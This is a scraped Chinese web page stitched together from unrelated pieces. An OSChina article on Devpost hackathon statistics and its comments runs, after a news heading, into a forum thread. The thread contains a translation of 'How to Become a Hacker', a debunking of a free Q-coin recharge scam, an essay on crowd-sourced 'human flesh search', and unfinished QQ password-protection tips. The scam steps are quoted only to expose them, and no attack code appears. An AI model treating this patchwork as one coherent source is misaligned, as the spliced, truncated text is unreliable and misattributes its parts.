黑客必须掌握的语言之间的语言

哪种编程语言最受黑客马拉松欢迎? - 开源中国社区
当前访客身份:游客 [
当前位置:
哪种编程语言最受黑客马拉松欢迎?
挑选哪门编程语言来学习,是个让人压力山大的问题。无论何时,当前流行的编程语言可能一年后人们就不再关注了,更何况是那些能帮你找到好工作的编程语言。所以,当程序员们不为老板干活、而进行那些纯粹出于兴趣的个人项目时,他们用什么编程语言就很值得关注了。那,就让我们就从黑客马拉松讲起。很多黑客马拉松(也包括在每届 TechCrunch Disrupt 大会前我们举办的黑客松活动)都使用的后端架构工具 ChallengePost 在今天早上有了新的名字:Devpost。在新名庆祝会上,他们分享了超级多在过去一年里发生的种种事情。在黑客马拉松上,哪个移动平台曝光度最高?哪门编程语言最流行?哪些 API 被调用的最多?在举办过 160 场黑客马拉松、同 13281 名黑客完成了近 1 万个项目后,他们得到了一些回答。你可以 & ,不过接下来我想挑重点说几件有意思的事情:粉丝最多的移动平台花落谁家?安卓(Android)占 38.2%,iOS 居次席占 22.7%,Windows Phone 占 4.9%,其余的 34.2% 则是被其他非主流系统瓜分。Devpost 黑客马拉松上最流行的 10 门语言是:HTML/CSS(见下文注释)JavaScriptPythonJavaC/C++PHPObjective-CC#SwiftJSON (它不算是严格意义上的编程语言,不过出于某种原因还是被列在榜单上,所以我又加了第 11 名)RubyHTML、CSS 和 JavaScript
位居榜首,我们毫不意外(暂且不谈「脚本语言」和「编程语言」之争)。它们的容错度高,不需要编译器,在浏览器、而非某个特定操作系统中运行,新程序员们
逐渐开始选择它们所为入门语言。如果你进到一间满是陌生人的房间,想在此寻找一个开发团队(这种事黑客马拉松上就时有发生),他们掌握的很可能就是这三门
语言。注释:HTML 并不算是「编程」语言——它是标记语言,用于标记和输出文档元素。不过它确实是一门语言,并且相当多的 web 程序员每天都使用它,所以字意争论暂且不表。Swift 攀升速度如此之快,让人意外——要知道,苹果 13 个月之前才刚发布它。那 API 的使用情况如何?Devpost 没有把所有 API 放在一起比较,而是分门别类地进行统计,每一类别的工具都相当出色。谁
是最受欢迎的通信类 API?答案是 Twilio。社交类呢?Facebook(啧~),随后是 Twitter(啧啧~)支付类呢?Venmo
击败了贝宝(Paypal)荣登榜首,而 Stripe 意外地只居第三。最后毫无悬念地,谷歌地图赢得了地理类 API 榜首位置。Twilio 在通信类的胜出非常让人信服,因为它在黑客马拉松上极度活跃。每次参加黑客马拉松,虽然它只是非官方的众多推荐之一,我也总能见到它的身影。Twilio 要求每位新职员通过它的 API 来完成一个项目。Twilio 与另一家公司一同创立了 ,后者专注于全世界学生黑客马拉松比赛。在游戏类,Unity 统治了大半壁江山,有 1000 多个 Unity 项目提交。位居第二的 Pygame 仅有不到 50 个。Devpost 好像有意挑起「圣战」,还统计了文本编辑器的使用情况。获胜者是 Sublime Text,同样也是我的选择,本文就是在这个软件里写成的(译者也是在这里完成翻译的)。那些兼有软件和硬件的项目,表现又如何呢?Arduino
获选黑客硬件之王,可谓当之无愧。它足够多变、可为很多轻量的电子元件项目重造,它亦足够便宜、用坏两三个也不会太心疼。可谓「黑客上手、即用即会」。紧
随其后的是多款特定用途的设备:Myo 手势控制臂环、Pebble 智能手表、Leap motion 手势控制器、Oculus Rift VR
头戴显示器。令人意外的是,灵活又便宜的 Raspberry Pi 仅排第六。注意:以上数据有戏谑成分,不能完全反映真实情况。编程语言榜前五名都值得一学,但不做提倡作为专业参考。如果你还在犹豫学哪门语言,我的建议是
选择一门容错度高的语言(JavaScript
值得一试),全神贯注地理解编程要义,并且仔细对比每处细微差异。如果有人告诉你,你选错了入门语言,你应该去学“2015 最流行的语言”,别鸟他们。 。准备好你的第一次黑客马拉松之旅了?你知道不?距离 & ,仅剩短短几周。[感谢 Devpost(即之前的 ChallengePost)投递以上数据]翻译:魚生臣()
想通过手机客户端(支持 Android、iPhone 和 Windows Phone)访问开源中国:
旧一篇: 1年前
新一篇: 1年前
你也许会喜欢
看来黑客们不太喜欢世界最好的编程语言(没有之一)PHP呀。
2楼:贫道法号-乱来
大py 前三啊
3楼:SupNatural
python大法好。
看了下排名,竟然还有Ajax,这个分类有点神奇啊
5楼:PacoXie
竟然不是python第一
7楼:afjal
08:55 (非会员)
看了一下完整榜单,其中13、Ajax,20、OpenGL,25、WebGL,29 、JSP 居然也叫 Programming languages,这个分类确实神奇。
8楼:JM_Joy 来自
这是什么逗比游戏
9楼:喵小强
还以为python会第一
10楼:滚地龙
看来黑客们不太喜欢世界最好的编程语言(没有之一)PHP呀。
11楼:开源中国匿名会员
PHP 太牛逼太高深了,黑客们要避开,要不然装不了B。
12楼:布衣小贩
python 大数据处理看好你
13楼:从今以后
怎么感觉跟我平时理解的黑客不一样,倒像是极客多点
14楼:诸葛囧明
node 和 angular 放在一起算什么鬼
15楼:无若
引用来自“SupNatural”的评论python大法好。+1
16楼:0Scn
引用来自“__c”的评论看了下排名,竟然还有Ajax,这个分类有点神奇啊你都不会看注释,这有什么好说的……
17楼:renwofei423
引用来自“SupNatural”的评论python大法好。^_^
18楼:eechen
引用来自“开源中国匿名会员”的评论PHP 太牛逼太高深了,黑客们要避开,要不然装不了B。C#才叫高深呢,都被挤到OC后面了,好惨呀.排第六的PHP作为服务器端的HTML预处理器,跟前两名的HTML/CSS/JavaScript前后呼应,看谁以后还嘲笑动态的Web开发脚本语言.
19楼:eechen
引用来自“七液”的评论看来黑客们不太喜欢世界最好的编程语言(没有之一)PHP呀。黑客们喜欢用来进行Web开发的HTML/CSS/JS,而PHP作为HTML预处理器,排在第六,怎么能说黑客不喜欢呢?你让后面的C#和Ruby情何以堪.
20楼:大德易科
最喜欢的还是html
与内容无关的评论将被删除,严重者禁用帐号
本周热点资讯
本站最新资讯  长久以来,存在一个专家级程式员和网络高手的共享文化社群,其历史能够追溯到几十年前第一台分时共享的小型机和最早的ARPAnet实验时期。 这个文化的参和者们创造了“黑客”这个词。 黑客们建起了Internet。黑客们使Unix操作系统成为今天这个样子。黑客们搭起了Usenet。黑客们让WWW正常运转。假如您是这个文化的一部分,假如您已为他作了些贡献,而且圈内的其他人也知道您是谁并称您为一个黑客,那么您就是一名黑客。   黑客精神并不但仅局限于软件黑客文化圈中。有些人同样以黑客态度对待其他事情如电子和音乐---事实上,您能够在任何较高级别的科学和艺术中发现他。软件黑客们识别出这些在其他领域同类并把他们也称作黑客---有人宣称黑客实际上是单独于他们工作领域的。 但在本文中,我们将注意力集中在软件黑客的技术和态度,连同发明了“黑客”一词的哪个共享文化传统之上。   另外更有一群人,他们大声嚷嚷着自己是黑客,实际上他们却不是。他们是一些蓄意破坏电脑和电话系统的人(多数是青春期的少年)。真正的黑客把这些人叫做“骇客”(cracker),并不屑和之为伍。多数真正的黑客认为骇客们是些不负责任的懒家伙,还没什么大本事。专门以破坏别人安全为目的的行为并不能使您成为一名黑客, 正如拿根铁丝能打开汽车并不能使您成为一个汽车工程师。不幸的是,很多记者和作家往往错把“骇客”当成黑客;这种做法激怒真正的黑客。   根本的区别是:黑客们建设,而骇客们破坏。   假如您想成为一名黑客,继续读下去。假如您想做一个骇客,去读 alt.2600 新闻组,并在发现您并不像自己想象的那么聪明的时候去坐5到10次监狱。 关于骇客,我只想说这么多。
楼主发言:47次 发图:
  沙发自己先顶起来
  ---黑客的态度   黑客们解决问题,建设事物,信仰自由和双向的帮助,人人为我, 我为人人。   要想被认为是一名黑客,您的行为必须显示出您已具备了这种态度。要想做的好象您具备这种态度,您就不得不真的具备这种态度。但是假如您想*培养黑客态度在黑客文化中得到承认,那就大错特错了。因为成为具备这些特质的这种人对您自己很重要,有助于您学习,并给您提供源源不断的活力。同任何有创造性的艺术相同,成为大师的最有效方法就是模仿大师的精神---不是仅从理智上,更要从感情上进行模仿。   So,假如您想做一名黑客,重复以下事情直到您相信他们:   1 这世界充满待解决的迷人问题   做一名黑客有很多乐趣,但却是些要费很多气力方能得到的乐趣。 这些努力需要动力。成功的运动员从健壮体魄,挑战自我极限中汲取动力。同样,做黑客,您必须   要有从解决问题,磨练技术,锻炼智力中得到基本的热望。假如您还不是这类人又想做黑客,您就要设法成为这样的人。否则您会发现,您的黑客热情会被其他诱惑无情地吞噬掉---如金钱、性和社会上的虚名。   (同样您必须对您自己的学习能力建立信心---相信尽管您对某问题所知不多,但假如您一点一点地学习、试探,您最终会掌控并解决他。)   2. 一个问题不应该被解决两次   聪明的脑瓜是宝贵的,有限的资源。当这个世界还充满其他有待解决的有趣问题之时,他们不应该被浪费在重新发明轮子这些事情上。 作为一名黑客,您必须相信其他黑客的思考时间是宝贵的---因此共享信息,解决问题并发布结果给其他黑客几乎是一种道义,这样其他人就能够去解决新问题而不是重复地对付旧问题。   (您不必认为您一定要把您的发明创造公开出去,但这样做的黑客是赢得大家尊敬最多的人。卖些钱来给自己养家糊口,买房买车买电脑甚至发大财和黑客价值也是相容的,只要您别忘记您还是个黑客。)
  http://ll365.  这是本人的扣扣空间地址 日志里也许有你感兴趣的文章  整理下思路 再写下去
  点击    关注楼主 方便下次查看
  写一个 打击免费刷Q币,请大家醒醒吧!  打击免费刷Q币,请大家醒醒吧!  因为看不惯也忍不住,虽然不知道这样骂半天是否真的有效果,但希望,真的很希望,那些即将注意和已经注意的人可以来看一下,想个清楚。  骗局有很多马甲,刚躲过这招又遇上那招,这不,又收到垃圾邮件了  可笑之处1:  原文:“刷到了就尽快消费掉,最好Q币刷到后不要充值到主QQ上,我们完全可以通过以赠送Q币等方式给主QQ续费。”  指正:腾迅的官方网站我上了不下千次,可是为什么就没有找到赠送Q币这个功能呢?禁止这个功能就是腾迅为了防止有人盗别人QQ号来赚取Q币的。而该文中居然说“赠送”?你说荒谬不荒谬?  可笑之处2:  原文:“选择充值金额(注意:此时必须选择最大的充值金额,一般各地都开通了20Q币额的(10元的也一样),如没有就可选择10Q币额,这是免费充值能否成功的关键”  指正:这句话,将始作俑者的贪婪暴露无疑,为什么要让用户选择最大充值金额呢?当然了,你充的越多,这个骗子得到的好处便越多!卑鄙!  可笑之处3:  原文:“选择完充值额后系统会提示输入您的QQ号码,这时你输入,“”其实就是电信内部代码,主要是腾讯供中国电信内部工作人员测试电话充值Q币用的专用代码,因为是没有以“0”开头的QQ号码的”  指正:简直是胡言乱语,这是骗不懂事的孩子的伎俩。腾迅的QQ号如果前面加0,系统会默认为空,不计算在内。而这个骗子居然说成是什么电信的代码?切,我服了,*这点小聪明就想骗人?如果大家不相信可以自己试一下,你在登陆QQ的时候前面输几个零再登陆试试,登陆了还是你的QQ,所以你明白了吧?如果你按他的说法来做,那么你的Q币就会充到“1234567”这个QQ号里。  可笑之处4:  原文:“输入这个专用代码腾讯充值系统就会确认你为电信内部工作人员在测试电话充值Q币业务,所以就不需要担心要收费了,再次确认后充值系统会报出一个字符串(确认后如遇有极个别系统没有及时报出字符串的情况发生也属正常现象,建议从头再试一次,这样就一定可以听到字符串了”  指正:贪婪之心人皆有之,但没有见过如此不要脸的人,居然说如果没有报出字符串也是正常现象,重头来一次!真黑。如果真的重头来一次,那么你的电话费就得再扣一次了  可笑之处5:原文:“用笔记下字符串后去腾讯官方网站http: //,登陆选择Q币卡充值,输入自己所要充值的QQ号码,Q币卡号及密码栏输入所记录的字符串, Q币卡号及密码都是相同的,点击确定就可以了,过几分钟后你查询一下我的帐户,这时你会发现Q币已经到帐了。”  指正:原来前面说的“字符串”到这里就变成Q币卡的账号了,而且账号和密码还一样。我晕,充过Q币卡的人都知道,哪有这样的事情?如果你真这么做了,过几分钟去查的话,你的账户里有Q币就见鬼了!  可笑之处6:  原文:“如系统不稳,当天没有刷币成功,可在第二天再次拨打”  指正:到了这里,这个骗子为了防止你马上看穿他的行为就再编了一个谎话。如“系统不稳”,放心吧,如果真的按他所说,那么百分之百会“系统不稳”了!  看看这个骗子的真面目吧!  不过,我想这个骗局里,他并不一定是用这个方法骗Q币的第一人,也不会是最后一个。也许明天会出来一个让你输更多“0”的家伙让你用这个方法来“刷Q币”。别傻了,没有这样的好事情,有钱你就去腾讯网站上买,没钱就老老实实的吧! 天下没有免费的午餐。
  继续写下去
  3. 无聊和乏味的工作是罪恶   黑客们应该从来不会被愚蠢的重复性劳动所困扰,因为当这种事情发生时就意味着他们没有在做只有他们才能做的事情---解决新问题。这样的浪费伤害每一个人。因此,无聊和乏味的工作不但仅是令人不舒服而已,他们是极大的犯罪。 要想做的象个黑客,您必须完全相信这点并尽可能多地将乏味的工作自动化,不但为您自己,也为了其他人(尤其是其他黑客们)。   (对此有一个明显的例外。黑客们有时也做一些重复性的枯燥工作以进行“脑力休息”,或是为练熟了某个技巧,或是获得一些除此无法获得的经验。但这是他自己的选择---有脑子的人不应该被迫做无聊的活儿。)   4 自由就是好   黑客们是天生的反权威主义者。任何能向您发命令的人会迫使您停止解决令您着迷的问题,同时,按照权威的一般思路,他通常会给出一些极其愚昧的理由。因此,不论何时何地,任何权威,只要他压迫您或其他黑客,就要和他斗到底。  (这并非说任何权力都不必要。儿童需要监护,罪犯也要被看管起来。 假如听从命令得到某种东西比起用其他方式得到他更节约时间,黑客会同意接受某种形式的权威。但这是个有限的、特意的交易;权力想要的那种个人听从不是您的给予,而是无条件的听从。)   权利喜爱审查和保密。他们不信任自愿的合作和信息共享---他们只喜欢由他们控制的合作。因此,要想做的象个黑客,您得对审查、保密,连同使用武力或欺骗去压迫人们的做法有一种本能的反感和敌意。   5. 态度不能替代能力   要做一名黑客,您必须培养起这些态度。但只具备这些态度并不能使您成为一名黑客,就象这并不能使您成为一个运动健将和摇滚明星相同。成为一名黑客需要花费智力,实践,奉献和辛苦。   因此,您必须学会不相信态度,并尊重各种各样的能力。黑客们不会为那些故意装模做样的人浪费时间,但他们却很尊重能力---尤其是做黑客的能力,但是任何能力总归是好的。具备很少人才能掌控的技术方面的能力尤其为好,而具备那些涉及脑力、技巧和聚精会神的能力为最好。   假如您尊敬能力,您会享受提高自己能力的乐趣---辛苦的工作和奉献会变成一种高度娱乐而非*役。 要想成为一名黑客,这一点很重要。
  下一节  ---基本黑客技术
  黑客态度是重要的,但技术更加重要。态度无法替代技术,在您被别的黑客称为黑客之前,有一套基本的技术您必须掌控。 这套基本技术随着新技术的出现和老技术的过时也随时间在缓慢改变。例如,过去包括使用机器码编程,而知道最近才包括了HTML语言。但现在明显包括以下技术:   1 学习如何编程   这当然是最基本的黑客技术。假如您还不会任何电脑语言,我建议您从Python开始。他设计清楚,文档齐全,对初学者很合适。尽管是一门很好的初级语言,他不但仅只是个玩具。他很强大,灵活,也适合做大型项目。   但是记住,假如您只会一门语言,您将不会达到黑客所需要的技术水平,甚至也不能达到一个普通程式员的水平---您需要学会如何以一个通用的方法思考编程问题,单独于任何语言。要做一名真正的黑客,您需要学会如何在几天内通过一些手册,结合您现在所知,迅速掌控一门新语言。这意味着您应该学会几种不同的语言。   假如要做一些重要的编程,您将不得不学习C语言,Unix的核心语言。其他对黑客而言比较重要的语言包括Perl和LISP。 Perl很实用,值得一学;他被广泛用于活动网页和系统管理,因此即便您从不用Perl写程式,至少也应该能读懂他。 LISP 值得学习是因为当您最终掌控了他您会得到丰富的经验;这些经验使您在以后的日子里成为一个更好的程式员,即使您实际上可能很少使用LISP本身。   当然,实际上您最好四种都会。 (Python, C, Perl, and LISP). 除了是最重要的四种基本语言,他们还代表了四种很不同的编程方法,每种都会让您受益非浅。   这里我无法完整地教会您如何编程---这是个复杂的活儿。但我能够告诉您,书本和课程也不能作到。几乎任何最好的黑客都是自学成材的。真正能起作用的就是去亲自读代码和写代码。   学习如何编程就象学习用自然语言写作相同。最好的做法是读一些大师的名著,试着自己写点东西,再读些,再写点,又读些,又写点....如此往复,直到您达到自己在范文中看到的简洁和力量。   过去找到好的代码去读是困难的,因为很少有大型程式的可用源代码能让新手练手。这种状况已得到了很大的改善;现在有很多可用的开放源码软件,编程工具和操作系统(全都有黑客写成)。这使我们自然地来到第二个话题...   2 得到一个开放源码的Unix并学会使用、运行他   我假设您已拥有了一台个人电脑或有一个可用的( 今天的孩子们真幸福 :-) )。新手们最基本的一步就是得到一份Linux或BSD-Unix,安装在个人电脑上,并运行他。   当然,这世界上除了Unix更有其他操作系统。但他们都是以二进制形式发送的---您无法读到他的源码,更不可能修改他。尝试在DOS或Windows的机器上学习黑客技术,就象是在腿上绑了铁块去学跳舞。   除此之外,Unix还是Internet的操作系统。您能够不知道Unix而学会用Internet,但不懂他您就无法成为一名Internet黑客。因为这个原因,今天的黑客文化在很大程度上是以Unix为中央的。(这点并不总是真的,一些很早的黑客对此很不高兴,但Unix和Internet之间的共生关系已是如此之强,甚至连微软也无可奈何)   So,装一个Unix---我个人喜欢Linux,但是也有其他选择。(您也能够在同一台机器上同时运行DOS,Windows和Linux)学会他。运行他。用他跟Internet对话。读他的代码。试着去修改他。您会得到比微软操作系统上好的多的编程工具(包括C,Lisp, Python, and Perl),您会得到乐趣,并将学到比您想象的更多知识。   关于学习Unix的更多信息,请看 The Loginataka.   要得到Linux,请看: 哪里能得到 Linux.   3 学会如何使用WWW和写HTML   大多黑客文化建造的东西都在您看不见的地方发挥着作用,帮助工厂、办公室和大学正常运转,表面上很难看到他对他人的生活的影响。Web是个大大的例外。即便政客也同意,这个巨大而耀眼的黑客玩具正在改变整个世界。单是这个原因(更有许多其他的), 您就需要学习如何掌控Web。  这并不是仅仅意味着如何使用浏览器(谁都会),而是要学会如何写HTML,Web的标记语言。假如您不会编程,写HTML会教您一些有助于学习的思考习惯。因此,先建起自己的主页。   但仅仅建一个主页也不能使您成为一名黑客。 Web里充满了各种网页。多数是无意义的,零信息量垃圾。   要想有价值,您的网页必须有内容---必须有趣或对其他黑客有用。这样,我们来到下一个话题....
  看的有点累了是么
  下节写点网络常识 大家看看
轻松一下  明天继续写 黑客
  何为人肉搜索引擎?  实际上,这里所说的人肉搜索引擎就是指更多的利用人工参与来提纯搜索引擎提供的信息的一种机制。猫扑的人肉搜索引擎就是其中一个比较成功的例子。后面我们会根据猫扑的人肉搜索引擎给出一个更加具体的描述。   针对搜索引擎的Link Farm和Spam也许永远不会停止,因为他们能够从他们的作恶中得到利益。我们知道得到利益不是作恶的唯一原因,然而大规模的工业化的作恶唯一的原因当然是那样可以得到利益。   所以,这是一场永远无法结束的战争,只要搜索引擎还是应用最广泛的一种互联网应用,只要搜索引擎还是用户用户找到合适服务的最主要手段,这就是一场永远无法结束的战争。很多人把问题归结于PageRank技术,历史是何其相似啊,当年人们也是这样地抱怨META关键字和描述技术。也许Google或者其他的公司能够研究出来更加伟大的技术(注一)来取代PageRank,但是谁知道这新的技术什么时候又会变成明日黄花。   搜索引擎是利用机器自动化的收集网络信息并有序化的一种技术。搜索引擎高效快速,然而因为现在人工智能并不完善,搜索引擎还很难甄别刻意的修饰过的信息,所以SEO Spam才会那么猖獗。所以,有些人想从搜索引擎的反面来解决问题,那就是更多的利用人工把搜索引擎得到的信息进一步萃取,进一步有序化,我们称之为人肉搜索引擎。   很多人知道的中国有一个叫做猫扑的论坛,人气非常旺。Tiny在2001年到2004年期间是这个论坛的忠实用户。在我的印象中,人肉搜索引擎的概念应该出自于猫扑。   跟很多论坛一样,猫扑上面也经常有人问这个问题那个问题。同时猫扑有种虚拟货币叫做Mp,问问题的人往往会用Mp来奖励可以帮助他们的人。虽然Mp不能吃不能喝,但是还是很多人醉心于挣取更多的Mp(注二)。那些惯于通过回答问题挣取Mp的人在猫扑一般叫做赏金猎人。   于是很有趣味的一幕出现了,某人需要解决一个问题,就在猫扑发贴并许与一定数量的Mp作为酬谢。很快,就会有赏金猎人看到这个贴子,他们就会去用搜索引擎来寻找问题的答案,然后争先恐后地把找到的答案回在帖子里面邀功。最后,提问题的人得到了答案,赏金猎人得到了Mp,皆大欢喜。这也就形成了所谓的人肉搜索引擎的机制。有趣的是,我们可以发现人肉搜索引擎的搜索流程和搜索引擎在不同服务器之间的分布式搜索流程看起来是那么的相似,区别仅仅在于发动和执行流程的是人,还是机器。   人肉搜索引擎的质量怎样保证呢?这是一个非常有趣的问题,从刚才的流程上大家可以发现,如果有足够多的赏金猎人,他们之间就会产生竞争,寻找资料速度的竞争,资料准确性的竞争。竞争的结果是,一个速度又快资料又准确全面的赏金猎人会有越来越多的Mp,这会给他带来更多的成就感(注三),同时他也会更加的醉心于赏金猎人的工作。甚至,据我所知很多赏金猎人会形成自己的职业道德和行为准则,这样可以给他们更大的自我实现,同时提高了用户的满意程度。这就形成可一个正反馈,一个良性循环,前提是有足够的激励(Mp)投入和足够产生竞争的参与者(赏金猎人)。   同时很多人也为自己是一个人肉搜索引擎的用户感到自豪,因为这确实太好用了,不需要担心分词不准确,不用担心电脑错误的理解了你的话,不用担心搜索引擎收录范围不同造成的风险(注四),甚至不需要学习搜索引擎怎么用(注五),而且答案也不会仅仅局限于搜索引擎能找到的信息,虽然绝大部分问题是通过搜索引擎就可以找到的。   然而,人肉搜索引擎几年来仅仅是一个概念,没有成为一种产品,在猫扑,人肉搜索引擎只能帮助猫扑提升人气,并不能成为一个产品给猫扑带来效益,同时也给更多的人服务。这是为什么呢?我想可能有4点原因:   1、猫扑人肉搜索引擎和论坛的差异不够明显。或者说在猫扑里,人肉搜索引擎只是论坛的一种应用而已,任何需要人肉搜索引擎服务的人必须是论坛的用户,这降低了用户普及度(注六)。   2、Mp过于游戏化。Mp是虚拟货币,是游戏化的货币,这也给猫扑的人肉搜索引擎加上了游戏性的标签。做赏金猎人的人仅仅是喜欢这个游戏化氛围的人,或者说是能被Mp这样的虚拟货币激励的人,这影响了赏金猎人队伍的扩大,从而影响了人肉搜索引擎的扩大。   3、人肉搜索引擎的反映比较慢。Google可以在0.00001秒内给你一个答案,然而人肉搜索引擎需要等待有人看到你的帖子,并找出结果才会有所反应。   4、猫扑人肉搜索引擎不能保留历史纪录,每次有一个问题出现,就会引发一次分布式搜索。即使问题是重复的,也会同样引发这个流程,而且相同的问题在不同的时间问,答案可能迥异(注七),不能对相同答案给予一致性的结果。   或者说,我觉得以上4点如果能够解决,人肉搜索引擎将能帮助我们更快更好的找到有用的信息。   -------------------   注一:按照某些人的猜测,新的搜索引擎页面估值革命性技术也许是利用Google加速器记录的用户访问行为来评估网站的流量,这个方案可以解决 PageRank的动态性不足问题。然而这个方案和Alexa何其的类似,一旦出台新一轮的作弊风潮一定出现,可以想象每个商业网站都会要求员工安装 Google加速器了,就像他们现在要求员工安装Alexa一样。当然Google的技术实力远非Alexa可比,一切也还仅仅是某些人的猜测。题外话,如果Google真的有一天声称会用Google加速器的访问记录来评估网站,那么Google加速器在中国安装量一定会非常的惊人,看起来这倒可以作为一个不错的推广方法。   注二:这实际上就是Mp机制带来的游戏性造成的,在分析猫扑的时候,Mp是一个关键,它造成了猫扑的游戏性,而猫扑的游戏性应该是它一直以来人气旺盛的主要原因。有人甚至说猫扑就是最好玩的网游,这还是有一定道理的。   注三:我猜测这是Mp机制的动力,也是其他的游戏机制的动力
  作个记号,还会来的。
  看的人好少哦   不过还是会继续写下去的
  ---黑客文化中的地位   象大部分不涉及金钱的文化相同,黑客王国的运转*声誉维护。您设法解决有趣的问题,但他们到底多有趣,您的解法有多好,是要有那些和您具备同样技术水平的人或比您更牛的人去评判的。   相应地,当您在玩黑客游戏时,您知道,您的分数要*其他黑客对您的技术的评估给出。(这就是为什么只有在其他黑客称您为黑客是,您才算得上是一名黑客)这个事实常会被黑客是一项孤独的工作这一印象所减弱;他也会被另一个黑客文化的禁忌所减弱(此禁忌的效力正在减弱但仍很强大):拒绝承认自我或外部评估是个人的动力。   特别地,黑客王国被人类学家们称为一种精英文化。在这里您不是凭借您对别人的统治来建立地位和名望,也不是*美貌,或拥有其他人想要的东西,而是*您的奉献。尤其是奉献您的时间,您的才智和您的技术成果。   要获得其他黑客的尊敬,您能够做以下五种事情:
  1. 写开放源码的软件   第一个(也是最基本和传统的)是写些被其他黑客认为有趣或有用的程式,并把程式的原代码公开给大家共享。   (过去我们称之为“免费软件-free software”,但这却使很多不知free的精确含义的人感到不解。现在我们很多人使用“开放源码-open source”这个词)   黑客王国里最受尊敬的大神们是那些写了大型的、具备广泛用途的软件,并把他们公开出去,使每人都在使用他的软件的人。   2. 帮助测试并修改开放源码的软件   黑客们也尊敬也那些使用、测试开放源码软件的人。在这个并非完美的世界上,我们不可避免地要花大量软件研发的时间在测试和抓臭虫阶段。 这就是为什么任何开放源码的作者稍加思考后都会告诉您好的beta测试员象红宝石相同珍贵。 (他知道如何清楚描述出错症状,很好地定位错误,能忍受快速发布的软件中的bug,愿意使用一些简单的诊断工具) 甚至他们中的一个能判断出哪个测试阶段是延长的、令人精疲力尽的噩梦,哪个只是个有益健康的玩意儿。   假如您是个新手,试着找一个赶兴趣的正在研发的程式,作一个好的beta测试员。从帮着测试,到帮着抓臭虫,到最后帮着改程式,您会不断进步。以后您写程式时,会有别人来帮您,您就得到了您当初善举的回报。   3. 公开有用的信息   另一个好事是收集整理网页上有用有趣的信息或文档如FAQ。许多主要FAQ的维护者和其他开放源码的作者相同受到大家的尊敬。   4. 帮助维护基础设施的运转 黑客文化是*自愿者运转的。要使Internet能正常工  作,就要有大量枯燥的工作不得不去完成----管理mail list,newsgroup,维护大量文档,研发RFC和其他技术标准等等。做这类事情的人会得到很多人的尊敬,因为每人都知道这些事情是耗时耗力的苦役,不象编码那样好玩。做这些事情需要毅力。   5. 为黑客文化本身服务   最后,您能够为这个文化本身服务(例如象我这样,写一个“如何成为黑客”的初级教程 :-) )(hehe,象我这样把他翻成中文 :-) ) 这并非一定要在您已在这里呆了很久,精通任何以上4点,获得一定声誉后后才能去做。   黑客文化没有领袖。精确地说,他确实有些文化英雄和部落长者和历史学家和发言人。若您在这圈内呆的够长,您或许成为其中之一。   记住:黑客们不相信他们的部落长者的自夸的炫耀,因此很明显地去追求这种名誉是危险的。您必须具备基本的谦虚和优雅。
  晚上再努力。。。
  @钱池 12楼
22:59:42  作个记号,还会来的。  -----------------------------  今晚写完介绍
晚点 写教程
  ---黑客和怪人(Nerd)的联系   同流行的传说相反,做一名黑客并不一定要您是个怪人。然而,很多黑客都是怪人。做一个出世者有助于您集中精力进行更重要的事情,如思考和编程。   因此,很多黑客都愿意接受“怪人”这个标签,更有甚者愿意使用“傻子(geek)”一词并自以为豪---这是宣布他们和主流社会不合作的声明。   假如您能集中足够的精力来做好黑客同时还能有正常的生活,这很好。今天作到这一点比我在1970年代是个新手是要容易的多。今天主流文化对技术怪人要友善的多。甚至有更多的人意识到黑客通常更富爱心,是块很好的做恋人和配偶的材料。 更多信息见 Girl's Guide to Geek Guys.   假如您因为生活上不如意而为做黑客而吸引,那也没什么---至少您不会分神了。或许以后您会找到自己的另一半。   重申一下,做一名黑客,您必须进入黑客精神之中。当您不在电脑边上时,您仍然有很多事情可做。他们并不能替代真正的编程(没有什么能替代编程),但很多黑客都那么做,并感到他们和黑客精神存在一种本质的关联。   阅读科幻小说。参加科幻小说讨论会。(一个很好的寻找黑客的场合)   研究禅宗,或练功习武。   练就一双精确的耳朵,学会鉴赏特别的音乐。学会玩某种乐器,或唱歌。   提高对双关语的鉴赏。   学会流畅地用母语写作。(令人惊讶的时,我所知道的任何最棒的黑客,都是很不错的作家)   这些事情,您做的越多,您就越适合做黑客。至于为什么偏偏是这些事情,原因并不很清楚,但他们都涉及到了左-右脑的综合技巧,这似乎是关键所在。(黑客们既需要清楚的逻辑思维,有时也需要强烈的跳出逻辑之外的直觉)   最后,更有一些不要去做的事情。   不要使用愚蠢的,过于哗
  现在开始吧......
  @隐士逍遥 呵呵
    测试
  --前言  对于认真阅读下来的朋友 在这里真诚的感谢你们的支持,的确 写了这么长的介绍  能继续看下去的人是需要耐心的。而想成为一名真正的黑客是需要很大的耐心跟 很强的  逻辑思维。  先说一个关于腾讯QQ 的技术问题  一般盗号者想得到我们的QQ密码,都要使用各种密码破解软件。当我们的QQ被别人盯上时,如何保护好自己的密码呢?在此我们向大家介绍几种常见而且有效的方法。  一;
防止QQ密码被破解的技巧  一、“Q”过不留痕—防止本地破解  本地破解基本都是通过破解QQ登录后保存在本地硬盘上的信息文件从而得到密码。显然,要想堵住这个漏洞必须从“登录”和“离开”入手,尽量保护好你的信息文件(包括聊天记录文件等,因为这也有可能导致密码泄漏),要不就干脆删除它。另外,对于使用暴力软件得盗号者,“Q主”本身密码的设置也很关键。  1.给信息加把“密码锁”  对于在家或固定上网的朋友来说,QQ的“消息保护模式”是一个不错的选择。选择该方式登录后,即使别人得到了你的聊天记录文件,没有密码也无可奈何(建议不要用QQ的登录密码作为消息保护的密码,否则消息保护这项功能就没什么意义了)。在开启“消息保护”功能时,建议同时开启“口令提示”,这样万一忘记消息保护密码,也不至于自己都进步去。具体设置为:点击“菜单”&“系统设置”,然后切换到“本地安全”,勾选“启用本地消息,再勾选“启用本地消息加密口令提示”。填写好提示问题和答案后“完成”。当忘记消息保护密码时,就可以通过“口令提示”进入。安全和麻烦似乎是一对冤家,为了安全,就请忍受一下那一点操作上的麻烦吧。  2.让消息彻底“消失”  特别强调一下在网吧或不固定场所上网的情况。由于网吧的特殊性,上网时我们应该在登录界面的“登录模式”中选择“网吧模式”。这样在关闭QQ的时候,QQ会自动提醒我们是否删除该号码的登录记录,点“是”后,我们的QQ信息就不会留在网吧的电脑上了。这种方法简单有效,可以很好地保护自己的隐私!  除了使用QQ本身所提供的“网吧模式”外,我们也可以使用其他一些软件手动清除使用QQ后遗留下来的密码、聊天记录等信息。从而保护QQ密码。这里推荐“QQ保镖”这款小工具,希望对大家有用。  “QQ保镖”的使用非常简单:在“设置”处填好QQ号,并选好QQ的安装路径,点击“开始清理”就可将遗留在电脑上的信息完全清除。  3.耐心大考验— 以杂制暴  使用穷举法破解QQ密码从理论来说一定可以成功,但它的效率极低,非常花时间。所以只要我们QQ密码设置得较为复杂,那么破解就会非常困难了。  